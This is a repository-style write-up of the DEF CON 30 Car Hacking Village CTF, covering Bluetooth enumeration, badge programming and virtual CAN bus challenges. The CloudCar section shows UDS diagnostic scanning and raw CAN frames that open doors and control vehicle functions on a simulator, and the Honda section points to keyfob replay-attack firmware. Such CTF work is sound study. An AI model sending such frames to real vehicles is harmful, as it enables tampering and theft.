.
├── .gitignore
├── assets
│   ├── fw_image.bin
│   ├── chv-badge.uf2
│   ├── redballoon.pcap
│   ├── cod-calculator.png
│   ├── crc16brute
│   │   ├── Makefile
│   │   └── crc16.c
│   └── defcon_dump_crc.zip
├── CRCly.md
├── RedBalloon.md
├── HondaHack.md
├── README.md
├── BadgeHack.md
├── Bluey.md
└── CloudCar.md

/.gitignore:
--------------------------------------------------------------------------------
```
.vscode/
assets/can-toys
```

/assets/fw_image.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/fw_image.bin

/assets/chv-badge.uf2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/chv-badge.uf2

/assets/redballoon.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/redballoon.pcap

/assets/cod-calculator.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/cod-calculator.png

/assets/crc16brute/Makefile:
--------------------------------------------------------------------------------
```make
CFLAGS += -Wall -Wextra -Werror

# no recipe on purpose: make's built-in rule compiles crc16 from crc16.c using CFLAGS
crc16:

.PHONY: clean
clean:
	$(RM) crc16
```

/assets/defcon_dump_crc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/defcon_dump_crc.zip

/CRCly.md:
--------------------------------------------------------------------------------
# CRC'ly - 900

This is a reverse engineering problem, in TriCore! Can you figure out what is going on under the hood? You might need a unicorn or a multi-headed serpent to help you out. You just have to figure out 4 things!

Dump file: [defcon_dump_crc](assets/defcon_dump_crc.zip)

/RedBalloon.md:
--------------------------------------------------------------------------------
# RedBalloon
Hacking RedBalloon hardware

## Packet Capture the Flag - 500

Redballoon has a pcap and a firmware image. Get it from them and update the firmware on the device with it to get the flag.

RedBalloon has a tool for modifying firmware and repackaging it, called [OFRAK](https://ofrak.com/)

```bash

```

/HondaHack.md:
--------------------------------------------------------------------------------
# Honda Hack
Challenges related to the recent Honda keyfob replay attack.

The car had a big sheet of paper with a QR code on it. I scanned the QR code, and it brought me to a Github page with Flipper Zero firmware that can perform a replay attack to unlock the doors:

[FlipperZero Honda Hack Firmware](https://github.com/nonamecoder/FlipperZeroHondaFirmware)

## What is the Honda Keyfob’s FCC ID? - 150

The website for the Flipper Zero firmware says the FCC ID is:

```
KR5V2X
```

## What frequency does the key fob operate on? - 200
HINT: Check the available frequencies on Flipper with custom firmware

From the same firmware page:

```
433.65
```

/README.md:
--------------------------------------------------------------------------------
# Car Hacking Village CTF - DEF CON 30

Here is my writeup for the Car Hacking Village (CHV) Capture the Flag (CTF),
from DEF CON 30 (11-14 August 2022).

## Challenge Sets:

- 3P0 - Get the VINs and program the VIN of one of the ECUs in a bench setup. Did not attempt.
- [BadgeHack](BadgeHack.md) - Hacking the CHV Badge (Raspberry Pi Pico)
- [Bluey](Bluey.md) - Bluetooth challenges
- [CloudCar](CloudCar.md) - virtual CAN bus hacking
- [CRC'ly](CRCly.md) - Highest point problem; RE for flag
- DIY - build your own CAN bus. Did not attempt.
- [HondaHack](HondaHack.md) - Recent CVE for Honda Key Fobs
- NERF Platform - shoot a nerf dart from truck brakes. Did not attempt.
- READ ME FIRST - Flags from reading the [rules](https://www.carhackingvillage.com/ctf-rules-2022). Not worth writeup.
- [RedBalloon](RedBalloon.md) - Hacking RedBalloon hardware

/assets/crc16brute/crc16.c:
--------------------------------------------------------------------------------
```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

// 0xc1c0

// Reflected CRC-16 update (polynomial 0xA001, the bit-reversed form of 0x8005),
// feeding one byte into the running CRC.
uint16_t crc16_update(uint16_t crc, uint8_t a) {
    int i;
    crc ^= a;
    for (i = 0; i < 8; ++i) {
        if (crc & 1)
            crc = (crc >> 1) ^ 0xA001;
        else
            crc = (crc >> 1);
    }
    return crc;
}

// CRC of a whole buffer, starting from a caller-supplied initial value.
uint16_t crc16(uint8_t *buf, size_t len, uint16_t initial) {
    size_t i;
    uint16_t crc = initial;
    for (i = 0; i < len; i++) {
        crc = crc16_update(crc, buf[i]);
    }
    return crc;
}

// Print a 256-entry table, one entry per byte value b, as a C initializer.
void print_table(void) {
    uint16_t crc;
    printf("table = { ");
    for (int b = 0; b < 256; b++) {
        crc = crc16_update((uint16_t)b << 8, (uint8_t)b);
        printf("0x%04x, ", crc);
    }
    printf(" };\n");
}

int main(void) {
    print_table();
    return 0;
}
```

/BadgeHack.md:
--------------------------------------------------------------------------------
# Badge Hack
Hacking the CHV Badge (Raspberry Pi Pico)

## Resources
- [Getting Started With Pico](https://datasheets.raspberrypi.com/pico/getting-started-with-pico.pdf)
- [Pico C/C++ SDK](https://datasheets.raspberrypi.com/pico/raspberry-pi-pico-c-sdk.pdf)
- [Pico MicroPython SDK](https://datasheets.raspberrypi.com/pico/raspberry-pi-pico-python-sdk.pdf)
- [RP2040 Microcontroller](https://www.raspberrypi.com/documentation/microcontrollers/rp2040.html)
- [How To: Buzzer Music with Pico](https://www.tomshardware.com/how-to/buzzer-music-raspberry-pi-pico)
- [Raspberry Pi Buzzer Player (many songs)](https://github.com/gumslone/raspi_buzzer_player)

## 7 note Mario - 200

Make the buzzer play the first 7 notes of the Super Mario theme

## LED sync - 150

Make some LEDs sync with the Super Mario. Make it flashy!

## Solution
First, back up the old firmware so you can restore it later.

```bash
./picotool save -a ~/Desktop/chv-badge.uf2
```

Then, install the [MicroPython image](https://micropython.org/download/rp2-pico/rp2-pico-latest.uf2) for the Raspberry Pi Pico. Just download it, then drag and drop it into the volume that mounts when you connect to the badge over USB in BOOTSEL mode (hold down the BOOTSEL button when plugging in the badge).

I used the [Pico Go](https://marketplace.visualstudio.com/items?itemName=Drincann.pico-go) extension for VSCode to develop on the board, which I learned about from reading [this blog](https://community.element14.com/members-area/personalblogs/b/andy-clark-s-blog/posts/vscode-and-micropython-for-the-pi-pico). This made it easy to test as I went (just click "Run" to see how things are working).

My code solves both challenges (plays the Mario theme, with the LEDs in the eyes flashing to the music).

```python
#!/usr/bin/env python
from machine import Pin, PWM
from utime import sleep
from random import choice


BUZZER_PIN = 20
buzzer = PWM(Pin(BUZZER_PIN))
volume = 50  # % of max
level = round(5000 * volume / 100)  # volume level for duty cycle

# Left eye: centre (pupil) LED plus three iris LEDs
LEYEC_PIN = 26
LEYEC = Pin(LEYEC_PIN, Pin.OUT)
LEYE1_PIN = 22
LEYE1 = Pin(LEYE1_PIN, Pin.OUT)
LEYE2_PIN = 21
LEYE2 = Pin(LEYE2_PIN, Pin.OUT)
LEYE3_PIN = 27
LEYE3 = Pin(LEYE3_PIN, Pin.OUT)

# Right eye: same layout
REYEC_PIN = 10
REYEC = Pin(REYEC_PIN, Pin.OUT)
REYE1_PIN = 12
REYE1 = Pin(REYE1_PIN, Pin.OUT)
REYE2_PIN = 13
REYE2 = Pin(REYE2_PIN, Pin.OUT)
REYE3_PIN = 11
REYE3 = Pin(REYE3_PIN, Pin.OUT)

# LED groups that get toggled together on each note
LEYE = [LEYEC, LEYE1, LEYE2, LEYE3]
LEYE_IRIS = [LEYE1, LEYE2, LEYE3]
REYE = [REYEC, REYE1, REYE2, REYE3]  # was [REYE1, REYE1, ...], which left the right pupil out
REYE_IRIS = [REYE1, REYE2, REYE3]
PUPILS = [LEYEC, REYEC]
IRISES = LEYE_IRIS + REYE_IRIS
EYES = LEYE + REYE
EYES_GROUPS = [LEYE, REYE, LEYE_IRIS, REYE_IRIS, PUPILS, IRISES, EYES]

# note name -> frequency in Hz
notes = {
    "B0": 31, "C1": 33, "CS1": 35, "D1": 37, "DS1": 39, "EB1": 39, "E1": 41,
    "F1": 44, "FS1": 46, "G1": 49, "GS1": 52, "A1": 55, "AS1": 58, "BB1": 58, "B1": 62,
    "C2": 65, "CS2": 69, "D2": 73, "DS2": 78, "EB2": 78, "E2": 82,
    "F2": 87, "FS2": 93, "G2": 98, "GS2": 104, "A2": 110, "AS2": 117, "BB2": 123, "B2": 123,
    "C3": 131, "CS3": 139, "D3": 147, "DS3": 156, "EB3": 156, "E3": 165,
    "F3": 175, "FS3": 185, "G3": 196, "GS3": 208, "A3": 220, "AS3": 233, "BB3": 233, "B3": 247,
    "C4": 262, "CS4": 277, "D4": 294, "DS4": 311, "EB4": 311, "E4": 330,
    "F4": 349, "FS4": 370, "G4": 392, "GS4": 415, "A4": 440, "AS4": 466, "BB4": 466, "B4": 494,
    "C5": 523, "CS5": 554, "D5": 587, "DS5": 622, "EB5": 622, "E5": 659,
    "F5": 698, "FS5": 740, "G5": 784, "GS5": 831, "A5": 880, "AS5": 932, "BB5": 932, "B5": 988,
    "C6": 1047, "CS6": 1109, "D6": 1175, "DS6": 1245, "EB6": 1245, "E6": 1319,
    "F6": 1397, "FS6": 1480, "G6": 1568, "GS6": 1661, "A6": 1760, "AS6": 1865, "BB6": 1865, "B6": 1976,
    "C7": 2093, "CS7": 2217, "D7": 2349, "DS7": 2489, "EB7": 2489, "E7": 2637,
    "F7": 2794, "FS7": 2960, "G7": 3136, "GS7": 3322, "A7": 3520, "AS7": 3729, "BB7": 3729, "B7": 3951,
    "C8": 4186, "CS8": 4435, "D8": 4699, "DS8": 4978,
}

# Super Mario theme; 0 is a rest
melody = [
    notes["E7"], notes["E7"], 0, notes["E7"], 0, notes["C7"], notes["E7"], 0,
    notes["G7"], 0, 0, 0, notes["G6"], 0, 0, 0,
    notes["C7"], 0, 0, notes["G6"], 0, 0, notes["E6"], 0, 0,
    notes["A6"], 0, notes["B6"], 0, notes["AS6"], notes["A6"], 0,
    notes["G6"], notes["E7"], notes["G7"], notes["A7"], 0, notes["F7"], notes["G7"], 0,
    notes["E7"], 0, notes["C7"], notes["D7"], notes["B6"], 0, 0,
    notes["C7"], 0, 0, notes["G6"], 0, 0, notes["E6"], 0, 0,
    notes["A6"], 0, notes["B6"], 0, notes["AS6"], notes["A6"], 0,
    notes["G6"], notes["E7"], notes["G7"], notes["A7"], 0, notes["F7"], notes["G7"], 0,
    notes["E7"], 0, notes["C7"], notes["D7"], notes["B6"], 0, 0,
]

# one divisor per note (pace / tempo[i] = note length); 9 marks the two triplet runs
tempo = [12] * 32 + [9, 9, 9] + [12] * 28 + [9, 9, 9] + [12] * 12
assert len(tempo) == len(melody)


def toggle_leds(leds):
    for led in leds:
        led.toggle()


def buzz(frequency, length):
    # a rest: stay silent for the note length
    if frequency == 0:
        sleep(length)
        return

    buzzer.freq(frequency)
    buzzer.duty_u16(level)
    # flash a random LED group for the duration of the note
    leds = choice(EYES_GROUPS)
    toggle_leds(leds)
    sleep(length)
    toggle_leds(leds)
    buzzer.duty_u16(0)


def play(melody, tempo, pause, pace=0.800):
    for i in range(0, len(melody)):  # Play song
        noteDuration = pace / tempo[i]
        buzz(melody[i], noteDuration)  # Change the frequency along the song note

        pauseBetweenNotes = noteDuration * pause
        sleep(pauseBetweenNotes)


def silence():
    buzzer.duty_u16(0)


if __name__ == "__main__":  # Program start from here
    print("Playing Super Mario Brothers")
    try:
        while True:
            play(melody, tempo, 0.30, 1.2000)
            sleep(1)
    except:  # catch-all so the buzzer is silenced when the run is interrupted
        silence()
```

/Bluey.md:
--------------------------------------------------------------------------------
# Bluey

Bluetooth-related challenges.

Before you start:

```bash
# install bluetooth tools on Linux
$ sudo apt update
$ sudo apt install -y bluetooth bluez bluez-tools rfkill

# ensure your user is added to the 'lp' group to allow pairing
$ sudo usermod -aG lp $USER
$ sudo newgrp lp

# make sure you have a bluetooth device available on your computer
$ hcitool dev
Devices:
	hci1	B8:27:EB:76:11:25

# if necessary, restart bluetooth service
$ service bluetooth restart
$ service dbus restart

# disable/enable bluetooth device
$ hciconfig hci0 down
$ hciconfig hci0 up

# check that bluetooth isn't blocked by rfkill
$ sudo rfkill
$ sudo rfkill unblock bluetooth

# scan for bluetooth LE devices (find desired MAC, or name if lucky)
$ sudo hcitool lescan
LE Scan ...
00:19:5D:37:FD:EA OroJackson
--- snip ---
```

## May I Speak to the Manager? - 15

What is the LMP version in use by the CTF Device?

```bash
$ sudo hcitool lescan
LE Scan ...
00:19:5D:37:FD:EA OroJackson
--- snip ---

$ hcitool info 00:19:5D:37:FD:EA
Requesting information ...
	BD Address:  00:19:5D:37:FD:EA
	OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D)
	Device Name: OroJackson
	LMP Version: 4.1 (0x7) LMP Subversion: 0x2209   # <== THIS
	Manufacturer: Broadcom Corporation (15)
	Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
		<3-slot packets> <5-slot packets>
		<3-slot EDR ACL>
		<5-slot EDR ACL>
		<3-slot EDR eSCO>
	Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00
	Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00
```

LMP Version: `4.1`


## Did you do your homework? - 15

BT devices will be assigned a "Class of device" to let other devices know what type of device they are communicating with. What is the class of device for the CTF Device?

```bash
# Inquire about device classes
$ hcitool inq
Inquiring ...
	F8:4D:89:79:F2:5A	clock offset: 0x68f0	class: 0x280104
	00:19:5D:37:FD:EA	clock offset: 0x6a7c	class: 0x5a020c   # <== THIS ONE
--- snip ---
```

To translate the class of device, use this webpage:
- [Class of Device (CoD) Calculator](https://www.ampedrftech.com/cod.htm)

![](assets/cod-calculator.png)

Class of Device: `Phone`


## Yu Yu Identifier - 15

Bluetooth services will always come with a UUID (Universally Unique Identifier) to let other devices know what they’re supposed to do. What is the UUID of the custom Bluetooth Service?

```bash
$ sdptool browse 00:19:5D:37:FD:EA
Browsing 00:19:5D:37:FD:EA ...
Service Search failed: Invalid argument
Service Name: Moby_Dick   # <== Custom Service name
Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers?
Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi   # <== Flag
Service RecHandle: 0x10006
Service Class ID List:
  UUID 128: 88888888-1111-0000-1111-888888888888   # <== UUID
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 26   # <== RFCOMM Channel
Profile Descriptor List:
  "Serial Port" (0x1101)
    Version: 0x0100
```

UUID: `88888888-1111-0000-1111-888888888888`


## This remote is broken… - 15

What RFCOMM Channel is the custom Bluetooth Service using?

See previous challenge output for solution steps.

RFCOMM Channel: `26`


## This wasn’t in the manual… - 20

The CTF Device is hosting a custom Bluetooth Service. What is the name of this service?

See [Yu Yu Identifier](#Yu%20Yu%20Identifier%20-%2015) challenge output for solution steps.

Service Name: `Moby_Dick`


## Address - 25

What is the Bluetooth Address of the CTF Device?

```bash
$ sudo hcitool lescan
LE Scan ...
00:19:5D:37:FD:EA OroJackson
--- snip ---
```

BT Address: `00:19:5D:37:FD:EA`


## Lays or Pringles? - 25

Who is the chip manufacturer of the Bluetooth chip on the CTF Device?

```bash
$ hcitool info 00:19:5D:37:FD:EA
Requesting information ...
	BD Address:  00:19:5D:37:FD:EA
	OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D)
	Device Name: OroJackson
	LMP Version: 4.1 (0x7) LMP Subversion: 0x2209
	Manufacturer: Broadcom Corporation (15)   # <== Chip Manufacturer
	Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
		<3-slot packets> <5-slot packets>
		<3-slot EDR ACL>
		<5-slot EDR ACL>
		<3-slot EDR eSCO>
	Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00
	Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00
```

Chip Manufacturer: `Broadcom`


## Name - 25

What is the name of the CTF Device?

```bash
$ sudo hcitool lescan
LE Scan ...
00:19:5D:37:FD:EA OroJackson
--- snip ---
```

Device name: `OroJackson`


## Walmart or Costco? - 25

Who is the OUI of the CTF Device?

```bash
$ hcitool info 00:19:5D:37:FD:EA
Requesting information ...
	BD Address:  00:19:5D:37:FD:EA
	OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D)   # <== THIS
	Device Name: OroJackson
	LMP Version: 4.1 (0x7) LMP Subversion: 0x2209
	Manufacturer: Broadcom Corporation (15)
	Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
		<3-slot packets> <5-slot packets>
		<3-slot EDR ACL>
		<5-slot EDR ACL>
		<3-slot EDR eSCO>
	Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00
	Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00
```

OUI: `ShenZen`


## Secret Flag - 25

It’s right there

```bash
$ sdptool browse 00:19:5D:37:FD:EA
Browsing 00:19:5D:37:FD:EA ...
Service Search failed: Invalid argument
Service Name: Moby_Dick
Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers?
Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi   # <== Flag
Service RecHandle: 0x10006
Service Class ID List:
  UUID 128: 88888888-1111-0000-1111-888888888888
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 26
Profile Descriptor List:
  "Serial Port" (0x1101)
    Version: 0x0100
```

Secret Flag: `Suzumebachi`


## Secret Key 1 - 25

Hidden in the information you’ve looked through to answer the challenges so far is one of the last two keys! You need the first one to get the second one.

The hint from the Moby_Dick service's description says:
```
The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers?
```

So we need to look for the service with RecHandle `0x80108`:
```bash
$ sdptool browse --tree 00:19:5D:37:FD:EA
Browsing 00:19:5D:37:FD:EA ...
--- snip ---
Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x80108   # <== Matching RecHandle
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1106 - OBEXFileTransfer
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0xa
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x5 - BrowseGroupList
  Data Sequence
    UUID16 : 0x1002 - PublicBrowseGroup
Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x1106 - OBEXFileTransfer
      Version (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00
Attribute Identifier : 0x2022   # <== Matching Attribute ID
  Data : 47 75 6e 67 6e 69 72 00   # <== hex-encoded key
--- snip ---
```

So the key is `47 75 6e 67 6e 69 72 00`, which is a hex-encoded string. To decode it, you can use [CyberChef](https://cyberchef.org/#recipe=From_Hex('Auto')To_Hexdump(16,false,false,false)&input=NDcgNzUgNmUgNjcgNmUgNjkgNzIgMDA) or the command line:

```bash
$ echo "47 75 6e 67 6e 69 72 00" | xxd -r -p
Gungnir
```

Secret Key: `Gungnir`


## This is side one, flip me over - 30

What is the Record Handle for the Bluetooth Service you were asked to look through for a hint?

```bash
$ sdptool browse 00:19:5D:37:FD:EA
Browsing 00:19:5D:37:FD:EA ...
Service Search failed: Invalid argument
Service Name: Moby_Dick
Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers?
Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi
Service RecHandle: 0x10006   # <== Service Record Handle
Service Class ID List:
  UUID 128: 88888888-1111-0000-1111-888888888888
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 26
Profile Descriptor List:
  "Serial Port" (0x1101)
    Version: 0x0100
```

Service Record Handle: `0x10006`


## Do you like pears or apples better? - 30

This device uses a fixed PIN code to pair with devices! That is an incredibly insecure way to configure a device, but I did it anyway! What is that PIN?

From the hint in the output of the previous command (Service Provider field):

```
The pairing PIN is the inverse of the last 2 bytes of the BT Address!
```

The BT Address is `00:19:5D:37:FD:EA`, so the last two bytes are `FD:EA`. Inverting the bits and printing the resulting hex, we get the following:

```bash
$ python -c 'print(f"{(~0xFDEA) & 0xFFFF:04x}")'
0215

# To pair to the CTF device (not required to solve challenge)
$ sudo bluetoothctl
[bluetooth]> scan on                  # put nearby devices into bluetoothctl database
[bluetooth]> pair 00:19:5D:37:FD:EA  # enter PIN when prompted
# optionally, trust the device for easier future connections
[bluetooth]> trust 00:19:5D:37:FD:EA

# maybe try this to pair with pin?
# http://www.heatxsink.com/entry/how-to-pair-a-bluetooth-device-from-command-line-on-linux
# rfcomm connect /dev/rfcomm0 00:11:22:33:44:55 1 &

# Additionally, it is good practice to enable secure simple pairing and enable page and inquiry scan with the following commands:
# hciconfig hci0 sspmode 1
# hciconfig hci0 piscan
```

Pairing pin: `0215`


## Secret Key 2 - 150

Well done, you’ve found the first key! Now use it to unlock the second key.

```bash
# first install the necessary python library to interact with bluetooth
$ pip install PyBluez
```

Then create the following file to send the data to the appropriate service.

`getkey2.py`:
```python
import bluetooth

# RFCOMM channel 26 is the custom "Moby_Dick" service found with sdptool
btsock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
btsock.connect(("00:19:5D:37:FD:EA", 26))
# send key 1 as a NUL-terminated string, the same encoding the SDP attribute used
btsock.send(b"Gungnir\x00")
print(btsock.recv(2049))
btsock.close()
```

Run the script, and it will spit out a message with the key.

/CloudCar.md:
--------------------------------------------------------------------------------
# Cloud Car
Virtual CAN bus hacking at https://cloudcar.canbushack.com/simulator


## Cloud Car START HERE - 100

Please go to [https://cloudcar.canbushack.com](https://cloudcar.canbushack.com)

Cloud Car is FREE during Def Con.

Please watch the YouTube Getting Started if you have any questions: [https://youtu.be/0CjFu-K3gNY](https://youtu.be/0CjFu-K3gNY)

Like the video Please!! It's my first one ever.

Flag is guessable.

Guesses:
- canbushack
- carfucar
- cloudcar
- hacktheplanet

Told after competition that flag was: `{flag}cloudcar`


## Kylle Door Open - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, open the **Driver Door**.

[https://cloudcar.canbushack.com](https://cloudcar.canbushack.com)

Looking at `cansniffer`, I saw messages from ArbID 12D that update when the door is opened/closed. I tried sending my own messages with that ArbID, but it was a dead end. Likely these are just status messages, and control happens elsewhere.

From `@fearfulspoon` on Discord:

- enumerated for ECUs
- enumerated for Services across those ECUs
- enumerated for Sub-functions across those services

For the physical stuff, I started looking at service

```
0x2F - INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
```

At first I got back a bunch of "nopes" on those scans, but then I ran them after starting a Diagnostic Control Session.

```bash
# Send Diag control prior to scan.
cansend vcan0 '620#0210020000000000'

# enumerate subfunctions for 2F - INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
./cc.py dcm subfunc 0x620 0x520 0x2f 2 3
-------------------
CARING CARIBOU v0.3
-------------------
Loaded module 'dcm'
Starting DCM sub-function discovery
Probing sub-function 0x2f data ['ff', 'ff'] (found: 8)
Done: Scan finished
Found sub-functions for service 0x2f (INPUT_OUTPUT_CONTROL_BY_IDENTIFIER):
Sub-function 02 0d
Sub-function 02 a0
Sub-function 02 a1
Sub-function 02 a2
Sub-function 14 36
Sub-function 22 24
Sub-function 22 25
Sub-function 33 34
```

After that, I started sending data to the sub-functions. Example:

```
cangen vcan0 -I 620 -D 072F2224FFFFFFFF -L 8
```

This caused the driver door to open. Sending 0s instead of Fs closed it. I never narrowed down which bit actually did the door, but it didn't matter at that point.

Went through and tested all the IOCBI sub-functions I found and was able to do wipers, sprayer, headlights, flashers, doors, trunk, fuel pump, and the Temp on the cluster.

One of the IOCBI sub functions makes the car go fast without any gas, btw. Fun bug.


## Get In Door Open - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, open the **Passenger Door**.

I tried the same things as for the other door, but no luck. The techniques the other team used for solving the previous challenge work for this one, too.


## Engine Memory - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, read the **ECM Memory**.

```bash
# DID NOT ATTEMPT
```


## Engine Overspeed - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, make the **Engine Speed High**.

I didn't attempt this one. I talked to one of the other teams, and they said they got it to work by sending messages to ArbIDs 0x064 and 0x074. They changed some of the octets to all F's and it worked. Haven't tried to see exactly how they pulled it off.

Here's a snapshot of sniffing normal traffic:

```
$ cansniffer -ct0 vcan0
00|ms | ID | data ...     < vcan0 # l=20 h=100 t=0 slots=1 >
00232 | 064 | 27 10 00 B6 10 5A '....Z
00022 | 074 | C0 0D 70 8E D1 96 00 00 ..p.....
00051 | 12D | 00 3E 00 16 00 00 .>....
00025 | 202 | 00 00 00 ...
00206 | 264 | 03 00 00 00 00 00 00 00 ........
00132 | 2EE | DD CC EE FF 00 00 ......
05195 | 350 | 3F 01 0C 00 00 1F ?.....
00443 | 411 | 00 F4 EB 3E 2B A1 B7 B0 ...>+...
00147 | 420 | F0 0D 04 00 00 00 ......
00119 | 42C | 00 00 04 03 02 01 00 00 ........
```


## Lights - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Diagnostic Messaging, **Activate the Headlights**.

I tried all the same tricks I used for the open door commands, but nothing worked. See [Kylle Door Open - 50](#Kylle%20Door%20Open%20-%2050) for a hint at the solution.


## Cluster Session Control - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, **IPC (Cluster) Session Control** to Enhanced Diagnostics.

```bash
# DID NOT ATTEMPT
```


## Engine Speed Read - 50

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, read the **Engine Speed** from the ECM.

Here's what I tried, but it didn't work. It's based on Wikipedia's list of [OBD2 PIDs](https://en.wikipedia.org/wiki/OBD-II_PIDs):
```bash
# log all CAN messages
candump -l vcan0

# send OBD2 messages requesting engine speed to every ArbID
cangen vcan0 -g1 -Ii -L8 -D 02010C0000000000

# search the log for a successful response
grep -i "410C" candump*.log
```


## Airbag VIN - 75

This is a VIN. But in the Airbag Controller!

I wrote a script that grabs the VIN using the UDS "Read Data By Identifier" service (0x22), VIN request (identifier 0xF190).

`getvin.sh`:
```bash
#!/bin/bash

iface="${1:-vcan0}"
src="${2:-7e0}"
dst="${3:-7e8}"

# exit on error
set -e

# sniff and capture responses (ISO-TP reassembly done by isotprecv)
VINFILE="$(mktemp -u /tmp/vin-isotp-XXX)"
isotprecv -s "$src" -d "$dst" -p 00 "$iface" > "$VINFILE" &
recv_pid=$!

# send the "get VIN" request
echo -n '22 f1 90' | isotpsend -s "$src" -d "$dst" -p 00 "$iface"
sleep 0.1

# parse out VIN: skip the "62 F1 90" response header, then hex-decode the rest
cat "$VINFILE"
tail -c +10 "$VINFILE" | xxd -p -r
echo

rm "$VINFILE"
kill $recv_pid &>/dev/null || true
```

```bash
# run my script to get the VIN
$ ~/dev/getvin.sh vcan0 7f1 7f9
62 F1 90 01 31 46 4C 41 47 56 49 4E 53 52 53 34 32 30 36 39 30
1FLAGVINSRS420690
```


## You Scanning (1st), (2nd) & (Last) - 100

With [Cloud Car](https://cloudcar.canbushack.com)

Using CAN Messaging, **SCAN for Diagnostic IDs**.

Get all 3 Flags from Cloud Car.

```bash
$ cat ~/.canrc
[default]
interface = socketcan

# figure out what ECUs are out there responding to probes
$ python3 cc.py -i vcan0 uds discovery
Identified diagnostics:
+------------+------------+
| 0x00000071 | 0x0000012d |
| 0x00000620 | 0x00000520 |
| 0x00000622 | 0x00000522 |
| 0x0000062c | 0x0000052c |
| 0x000007e0 | 0x000007e8 |
| 0x000007e2 | 0x000007e9 |
| 0x000007f1 | 0x000007f9 |
+------------+------------+

# Re-ran, didn't see 12d response ID anymore
+------------+------------+
| CLIENT ID  | SERVER ID  |
+------------+------------+
| 0x00000620 | 0x00000520 |
| 0x00000622 | 0x00000522 |
| 0x0000062c | 0x0000052c |
| 0x000007e0 | 0x000007e8 |
| 0x000007e2 | 0x000007e9 |
| 0x000007f1 | 0x000007f9 |
+------------+------------+

# perform service discovery
$ python3 cc.py -i vcan0 uds services 0x620 0x520
Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL
Supported service 0x11: ECU_RESET
Supported service 0x22: READ_DATA_BY_IDENTIFIER
Supported service 0x23: READ_MEMORY_BY_ADDRESS
Supported service 0x27: SECURITY_ACCESS
Supported service 0x28: COMMUNICATION_CONTROL
Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER
Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
Supported service 0x3e: TESTER_PRESENT
Supported service 0xba: Unknown service

$ python3 cc.py -i vcan0 uds services 0x622 0x522
Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL
Supported service 0x11: ECU_RESET
Supported service 0x22: READ_DATA_BY_IDENTIFIER
Supported service 0x23: READ_MEMORY_BY_ADDRESS
Supported service 0x27: SECURITY_ACCESS
Supported service 0x28: COMMUNICATION_CONTROL
Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER
